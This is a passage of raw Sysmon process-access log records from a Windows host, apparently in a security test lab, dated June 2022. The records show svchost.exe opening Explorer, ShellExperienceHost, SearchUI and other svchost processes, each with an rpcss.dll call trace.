10341000x8000000000000000193732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA40-6299-5B07-000000005F02}5236C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2A00-000000005F02}2168C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2A00-000000005F02}2168C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA41-6299-5C07-000000005F02}5320C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:15:45.537{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000193701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 